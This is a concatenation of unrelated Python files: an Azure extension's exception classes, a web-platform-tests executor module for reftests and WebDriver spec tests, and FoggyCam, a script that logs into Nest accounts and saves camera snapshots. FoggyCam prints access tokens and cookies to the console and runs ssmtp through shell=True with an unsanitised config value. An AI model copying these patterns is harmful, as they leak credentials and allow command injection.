return 'The ManagedIdentity extension is required to be installed ' \
'for Automatic Management to be enabled. Please set ' \
'EnableAutomaticManagement to false in public settings or ' \
'install the ManagedIdentityExtensionForLinux Azure VM ' \
'extension.'
class ManagedIdentityExtException(OneClickException):
"""
Thrown when we encounter an issue with ManagedIdentityExtensionForLinux
"""
error_code = ManagedIdentityExtErrorCode
def get_error_message(self, operation):
return 'Encountered an issue with the ManagedIdentity extension: ' \
'{0}'.format(self)
class MetadataAPIException(OneClickException):
"""
Thrown when we encounter an issue with Metadata API
"""
error_code = MetadataAPIErrorCode
def get_error_message(self, operation):
return 'Encountered an issue with the Metadata API: {0}'.format(self)
class OMSServiceOneClickException(OneClickException):
"""
Thrown when prerequisites were satisfied but could not retrieve the managed
workspace information from OMS service
"""
error_code = OMSServiceOneClickErrorCode
def get_error_message(self, operation):
return 'Encountered an issue with the OMS service: ' \
'{0}'.format(self)
if __name__ == '__main__' :
main()
|
base.py
|
import base64
import hashlib
import io
import json
import os
import threading
import traceback
import socket
import sys
from abc import ABCMeta, abstractmethod
from http.client import HTTPConnection
from typing import Any, Callable, ClassVar, Optional, Tuple, Type, TYPE_CHECKING
from urllib.parse import urljoin, urlsplit, urlunsplit
from .actions import actions
from .protocol import Protocol, BaseProtocolPart
if TYPE_CHECKING:
from ..webdriver_server import WebDriverServer
here = os.path.dirname(__file__)
def executor_kwargs(test_type, test_environment, run_info_data, **kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": test_environment.config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type in ("reftest", "print-reftest"):
executor_kwargs["screenshot_cache"] = test_environment.cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
# By default the executor may try to cleanup windows after a test (to best
# associate any problems with the test causing them). If the user might
# want to view the results, however, the executor has to skip that cleanup.
if kwargs["pause_after_test"] or kwargs["pause_on_unexpected"]:
executor_kwargs["cleanup_after_test"] = False
executor_kwargs["debug_test"] = kwargs["debug_test"]
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshots(screenshots):
"""Computes the sha1 checksum of a list of base64-encoded screenshots."""
return [hashlib.sha1(base64.b64decode(screenshot)).hexdigest()
for screenshot in screenshots]
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if not isinstance(item, dict):
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshots([item["screenshot"]])[0]
def get_pages(ranges_value, total_pages):
"""Get a set of page numbers to include in a print reftest.
:param ranges_value: Parsed page ranges as a list e.g. [[1,2], [4], [6,None]]
:param total_pages: Integer total number of pages in the paginated output.
:retval: Set containing integer page numbers to include in the comparison e.g.
for the example ranges value and 10 total pages this would be
{1,2,4,6,7,8,9,10}"""
if not ranges_value:
return set(range(1, total_pages + 1))
rv = set()
for range_limits in ranges_value:
if len(range_limits) == 1:
range_limits = [range_limits[0], range_limits[0]]
if range_limits[0] is None:
range_limits[0] = 1
if range_limits[1] is None:
range_limits[1] = total_pages
if range_limits[0] > total_pages:
continue
rv |= set(range(range_limits[0], range_limits[1] + 1))
return rv
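# Worked example matching the docstring above: ranges [[1, 2], [4], [6, None]]
# with 10 total pages select pages 1-2, page 4, and pages 6 through 10:
# assert get_pages([[1, 2], [4], [6, None]], 10) == {1, 2, 4, 6, 7, 8, 9, 10}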
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
def crashtest_result_converter(self, test, result):
return test.result_cls(**result), []
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
for setup_fn in [self.set_timeout, self.before_run]:
err = setup_fn()
if err:
self.result = (False, err)
return self.result
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the extra timeout since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
timeout = self.timeout + 2 * self.extra_timeout if self.timeout else None
finished = self.result_flag.wait(timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
if self.protocol.is_alive():
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive():
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None # type: ClassVar[str]
# convert_result is a class variable set to a callable converter
# (e.g. reftest_result_converter) converting from an instance of
# URLManifestItem (e.g. RefTest) + type-dependent results object +
# type-dependent extra data, returning a tuple of Result and list of
# SubtestResult. For now, any callable is accepted. TODO: Make this type
# stricter when more of the surrounding code is annotated.
convert_result = None # type: ClassVar[Callable[..., Any]]
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, logger, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.logger = logger
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
try:
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
result = self.do_test(test)
except Exception as e:
exception_string = traceback.format_exc()
self.logger.warning(exception_string)
result = self.result_from_exception(test, e, exception_string)
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol, subdomain=False):
scheme = "https" if protocol == "h2" else protocol
host = self.server_config["browser_host"]
if subdomain:
# The only supported subdomain filename flag is "www".
host = "{subdomain}.{host}".format(subdomain="www", host=host)
return "{scheme}://{host}:{port}".format(scheme=scheme, host=host,
port=self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"],
test.subdomain), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e, exception_string):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += exception_string
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = False
def __init__(self, logger, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class CrashtestExecutor(TestExecutor):
convert_result = crashtest_result_converter
class PrintRefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = True
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi, page_ranges):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.get_screenshot_list(test, viewport_size, dpi, page_ranges)
if not success:
return False, data
screenshots = data
hash_values = hash_screenshots(data)
self.screenshot_cache[key] = (hash_values, screenshots)
rv = (hash_values, screenshots)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def check_pass(self, hashes, screenshots, urls, relation, fuzzy):
"""Check if a test passes, and return a tuple of (pass, page_idx),
where page_idx is the zero-based index of the first page on which a
difference occurs if any, or None if there are no differences"""
assert relation in ("==", "!=")
lhs_hashes, rhs_hashes = hashes
lhs_screenshots, rhs_screenshots = screenshots
if len(lhs_hashes) != len(rhs_hashes):
self.logger.info("Got different number of pages")
return relation == "!=", None
assert len(lhs_screenshots) == len(lhs_hashes) == len(rhs_screenshots) == len(rhs_hashes)
for (page_idx, (lhs_hash,
rhs_hash,
lhs_screenshot,
rhs_screenshot)) in enumerate(zip(lhs_hashes,
rhs_hashes,
lhs_screenshots,
rhs_screenshots)):
comparison_screenshots = (lhs_screenshot, rhs_screenshot)
if not fuzzy or fuzzy == ((0, 0), (0, 0)):
equal = lhs_hash == rhs_hash
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match%s, checking pixel differences" %
("" if len(hashes) == 1 else " on page %i" % (page_idx + 1)))
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls,
page_idx if len(hashes) > 1 else None)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
if not equal:
return (False if relation == "==" else True, page_idx)
# All screenshots were equal within the fuzziness
return (True if relation == "==" else False, None)
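# For reference (derived from the unpacking of fuzzy above): a fuzzy value is
# a pair of (min, max) ranges, ((min_per_channel, max_per_channel),
# (min_pixels_different, max_pixels_different)). For example, a fuzzy of
# ((0, 2), (0, 10)) treats screenshots as matching when at most 10 pixels
# differ and no channel of any pixel differs by more than 2.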
def get_differences(self, screenshots, urls, page_idx=None):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s%s" %
(count,
per_channel,
"" if page_idx is None else " on page %i" % (page_idx + 1)))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
page_ranges = test.page_ranges
self.message = []
# Depth-first search of reference tree, with the goal
# of reaching a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
page_idx = None
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi, page_ranges)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
is_pass, page_idx = self.check_pass(hashes, screenshots, urls, relation, fuzzy)
if is_pass:
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1])
for item in reversed(nodes[1].references)))
else:
# We passed
return {"status": "PASS", "message": None}
# We failed, so construct a failure message
if page_idx is None:
# default to outputting the last page
page_idx = -1
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi, page_ranges)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url,
"screenshot": screenshots[0][page_idx],
"hash": hashes[0][page_idx]},
relation,
{"url": nodes[1].url,
"screenshot": screenshots[1][page_idx],
"hash": hashes[1][page_idx]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi, page_ranges):
success, data = self.get_screenshot_list(node,
viewport_size,
dpi,
page_ranges)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
def get_screenshot_list(self, node, viewport_size, dpi, page_ranges):
success, data = self.executor.screenshot(node, viewport_size, dpi, page_ranges)
if success and not isinstance(data, list):
return success, [data]
return success, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None # type: ClassVar[Type[Protocol]]
def __init__(self, logger, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, environ=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.environ = environ if environ is not None else {}
self.output_handler_kwargs = None
self.output_handler_start_kwargs = None
def setup(self, runner):
self.protocol = self.protocol_cls(self, self.browser)
super().setup(runner)
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc()
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def load(self, url):
pass
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
def window_handles(self):
return []
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WdspecProtocol(Protocol):
server_cls = None # type: ClassVar[Optional[Type[WebDriverServer]]]
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
self.environ = os.environ.copy()
self.environ.update(executor.environ)
self.output_handler_kwargs = executor.output_handler_kwargs
self.output_handler_start_kwargs = executor.output_handler_start_kwargs
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args,
env=self.environ)
self.server.start(block=False,
output_handler_kwargs=self.output_handler_kwargs,
output_handler_start_kwargs=self.output_handler_start_kwargs)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive():
self.server.stop()
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
unimplemented_exc = (NotImplementedError,) # type: ClassVar[Tuple[Type[Exception], ...]]
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {cls.name: cls(self.logger, self.protocol) for cls in actions}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
cmd_id = payload["id"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
with ActionContext(self.logger, self.protocol, payload.get("context")):
result = action_handler(payload)
except self.unimplemented_exc:
self.logger.warning("Action %s not implemented" % action)
self._send_message(cmd_id, "complete", "error", "Action %s not implemented" % action)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message(cmd_id, "complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message(cmd_id, "complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, cmd_id, message_type, status, message=None):
self.protocol.testdriver.send_message(cmd_id, message_type, status, message=message)
class ActionContext(object):
def __init__(self, logger, protocol, context):
self.logger = logger
self.protocol = protocol
self.context = context
self.initial_window = None
def __enter__(self):
if self.context is None:
return
self.initial_window = self.protocol.base.current_window
self.logger.debug("Switching to window %s" % self.context)
self.protocol.testdriver.switch_to_window(self.context)
def __exit__(self, *args):
if self.context is None:
return
self.logger.debug("Switching back to initial window")
self.protocol.base.set_window(self.initial_window)
self.protocol.testdriver._switch_to_frame(None)
self.initial_window = None
|
foggycam.py
|
"""FoggyCam captures Nest camera images."""
from urllib.request import urlopen
import urllib.request
import urllib.parse
import urllib.error
import json
from http.cookiejar import CookieJar
import os
import traceback
import uuid
import threading
import time
import shutil
from datetime import datetime
from subprocess import call
class FoggyCam(object):
"""FoggyCam client class that performs capture operations."""
nest_username = ''
nest_password = ''
nest_user_id = ''
nest_access_token = ''
nest_access_token_expiration = ''
nest_current_user = None
nest_session_url = 'https://home.nest.com/session'
nest_user_url = 'https://home.nest.com/api/0.1/user/#USERID#/app_launch'
nest_api_login_url = 'https://webapi.camera.home.nest.com/api/v1/login.login_nest'
nest_image_url = 'https://nexusapi-us1.camera.home.nest.com/get_image?uuid=#CAMERAID#&width=#WIDTH#&cachebuster=#CBUSTER#'
nest_verify_pin_url = 'https://home.nest.com/api/0.1/2fa/verify_pin'
nest_user_request_payload = {
"known_bucket_types":["quartz"],
"known_bucket_versions":[]
}
nest_camera_array = []
is_capturing = False
cookie_jar = None
merlin = None
temp_dir_path = ''
local_path = ''
def __init__(self, username, password):
self.nest_password = password
self.nest_username = username
self.cookie_jar = CookieJar()
self.merlin = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookie_jar))
if not os.path.exists('_temp'):
os.makedirs('_temp')
self.local_path = os.path.dirname(os.path.abspath(__file__))
self.temp_dir_path = os.path.join(self.local_path, '_temp')
self.initialize_session()
self.login()
self.initialize_user()
def initialize_twof_session(self, time_token):
"""Creates the first session to get the access token and cookie, with 2FA enabled."""
print ("Intializing 2FA session...")
target_url = self.nest_session_url + "?=_" + time_token
print (target_url)
try:
request = urllib.request.Request(target_url)
request.add_header('Authorization', 'Basic %s' % self.nest_access_token)
response = self.merlin.open(request)
session_data = response.read()
session_json = json.loads(session_data)
self.nest_access_token = session_json['access_token']
self.nest_access_token_expiration = session_json['expires_in']
self.nest_user_id = session_json['userid']
print (session_data)
except urllib.request.HTTPError as err:
print (err)
def initialize_session(self):
"""Creates the first session to get the access token and cookie."""
print ('INFO: Initializing session...')
payload = {'email':self.nest_username, 'password':self.nest_password}
binary_data = json.dumps(payload).encode('utf-8')
request = urllib.request.Request(self.nest_session_url, binary_data)
request.add_header('Content-Type', 'application/json')
try:
response = self.merlin.open(request)
session_data = response.read()
session_json = json.loads(session_data)
self.nest_access_token = session_json['access_token']
self.nest_access_token_expiration = session_json['expires_in']
self.nest_user_id = session_json['userid']
print ('INFO: [PARSED] Captured authentication token:')
print (self.nest_access_token)
print ('INFO: [PARSED] Captured expiration date for token:')
print (self.nest_access_token_expiration)
cookie_data = dict((cookie.name, cookie.value) for cookie in self.cookie_jar)
for cookie in cookie_data:
print (cookie)
print ('INFO: [COOKIE] Captured authentication token:')
print (cookie_data["cztoken"])
except urllib.request.HTTPError as err:
if err.code == 401:
error_message = err.read()
unauth_content = json.loads(error_message)
if unauth_content["status"].lower() == "verification_pending":
print ("Pending 2FA verification!")
two_factor_token = unauth_content["2fa_token"]
phone_truncated = unauth_content["truncated_phone_number"]
print ("Enter PIN you just received on number ending with", phone_truncated)
pin = input()
payload = {"pin":pin ,"2fa_token":two_factor_token}
binary_data = json.dumps(payload).encode('utf-8')
request = urllib.request.Request(self.nest_verify_pin_url, binary_data)
request.add_header('Content-Type', 'application/json')
try:
response = self.merlin.open(request)
pin_attempt = response.read()
parsed_pin_attempt = json.loads(pin_attempt)
if parsed_pin_attempt["status"].lower() == "id_match_positive":
print ("2FA verification successful.")
utc_date = datetime.utcnow()
utc_millis_str = str(int(utc_date.timestamp())*1000)
print ("Targetting new session with timestamp: ", utc_millis_str)
cookie_data = dict((cookie.name, cookie.value) for cookie in self.cookie_jar)
print ('INFO: [COOKIE] Captured authentication token:')
print (cookie_data["cztoken"])
self.nest_access_token = parsed_pin_attempt['access_token']
self.initialize_twof_session(utc_millis_str)
else:
print ("Could not verify. Exiting...")
exit()
except:
traceback.print_exc()
print ("Failed 2FA checks. Exiting...")
exit()
print ('INFO: Session initialization complete!')
def login(self):
"""Performs user login to get the website_2 cookie."""
print ('INFO: Performing user login...')
post_data = {'access_token':self.nest_access_token}
post_data = urllib.parse.urlencode(post_data)
binary_data = post_data.encode('utf-8')
print ("INFO: Auth post data")
print (post_data)
request = urllib.request.Request(self.nest_api_login_url, data=binary_data)
request.add_header('Content-Type', 'application/x-www-form-urlencoded')
response = self.merlin.open(request)
session_data = response.read()
print (session_data)
def initialize_user(self):
"""Gets the assets belonging to Nest user."""
print ('INFO: Initializing current user...')
user_url = self.nest_user_url.replace('#USERID#', self.nest_user_id)
print ('INFO: Requesting user data from:')
print (user_url)
binary_data = json.dumps(self.nest_user_request_payload).encode('utf-8')
request = urllib.request.Request(user_url, binary_data)
request.add_header('Content-Type', 'application/json')
request.add_header('Authorization', 'Basic %s' % self.nest_access_token)
response = self.merlin.open(request)
response_data = response.read()
print (response_data)
user_object = json.loads(response_data)
for bucket in user_object['updated_buckets']:
bucket_id = bucket['object_key']
if bucket_id.startswith('quartz.'):
camera_id = bucket_id.replace('quartz.', '')
print ('INFO: Detected camera configuration.')
print (bucket)
print ('INFO: Camera UUID:')
print (camera_id)
self.nest_camera_array.append(camera_id)
def capture_images(self, config=None):
"""Starts the multi-threaded image capture process."""
print ('INFO: Capturing images...')
self.is_capturing = True
if not os.path.exists('capture'):
os.makedirs('capture')
for camera in self.nest_camera_array:
camera_path = ''
# Determine whether the entries should be copied to a custom path
# or not.
if not config["path"]:
camera_path = os.path.join(self.local_path, 'capture', camera, 'images')
else:
camera_path = os.path.join(config["path"], 'capture', camera, 'images')
# Provision the necessary folders for images and videos.
if not os.path.exists(camera_path):
os.makedirs(camera_path)
hour = datetime.now().hour
if config['monitoring'][camera] is None or \
config['monitoring'][camera][0] <= hour < config['monitoring'][camera][1]:
self.perform_capture(config=config, camera=camera, camera_path=camera_path)
# image_thread = threading.Thread(target=self.perform_capture, args=(config, camera, camera_path))
# image_thread.daemon = True
# image_thread.start()
# while True:
# time.sleep(1)
def perform_capture(self, config=None, camera=None, camera_path=''):
"""Captures images."""
# while self.is_capturing:
file_id = str(uuid.uuid4().hex)
image_name = str(datetime.now())
image_name = image_name.replace(':', '-').replace(' ', '_')
image_url = self.nest_image_url.replace('#CAMERAID#', camera).replace('#CBUSTER#', str(file_id)).replace('#WIDTH#', str(config["width"]))
request = urllib.request.Request(image_url)
request.add_header('accept', 'accept:image/webp,image/apng,image/*,*/*;q=0.8')
request.add_header('accept-encoding', 'gzip, deflate, br')
request.add_header('user-agent', 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Mobile Safari/537.36')
request.add_header('referer', 'https://home.nest.com/')
try:
response = self.merlin.open(request)
with open(camera_path + '/' + image_name + '.jpg', 'wb') as image_file:
image_file.write(response.read())
except urllib.request.HTTPError as err:
if err.code == 403:
self.initialize_session()
self.login()
self.initialize_user()
except Exception:
print ('ERROR: Could not download image from URL:')
print (image_url)
traceback.print_exc()
finally:
imgpath = camera_path + '/' + image_name + '.jpg'
if not os.path.exists(imgpath) or os.path.getsize(imgpath) < 100:
with open('tmp_email.txt', 'w') as email:
email.write("To: " + config["email"] + '\nFrom: '
+ config["email"] + '\nSubject: NEST alert\n\nImage '
+ image_name + ' was not captured\n')
call('ssmtp ' + config["email"] + ' < ' + 'tmp_email.txt', shell=True)
os.remove('tmp_email.txt')
else:
try:
shutil.copy2(imgpath, config["storage"][camera])
except:
with open('tmp_email.txt', 'w') as email:
email.write("To: " + config["email"] + '\nFrom: '
+ config["email"] + '\nSubject: NEST alert\n\nImage '
+ image_name + ' was not copied to storage\n')
call('ssmtp ' + config["email"] + ' < ' + 'tmp_email.txt', shell=True)
os.remove('tmp_email.txt')
|
globals.py
|
#!/usr/bin/env python3
# MIT License
#
